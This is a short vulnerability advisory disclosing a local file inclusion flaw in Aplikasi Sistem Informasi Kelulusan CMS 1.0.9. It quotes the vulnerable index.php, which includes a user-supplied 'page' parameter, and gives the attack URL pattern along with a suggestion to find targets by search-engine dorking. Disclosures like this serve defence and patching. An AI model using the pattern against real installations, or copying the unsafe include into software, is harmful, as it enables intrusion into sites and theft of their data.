Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.
====================================================================================================================================
| # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) |
| # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] the infected file : index.php
<?php
require "config.php";
error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
$page=$_GET['page'];
$filename="content/$page.php";
if (!file_exists($filename))
{
include "content/home.php";
}
else
{@include "content/$page.php";}
?>
[+] LFI : /index.php?page= [Ev!l]
====Greetings to :=========================================================================================================================
| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===========================================================================================================================================
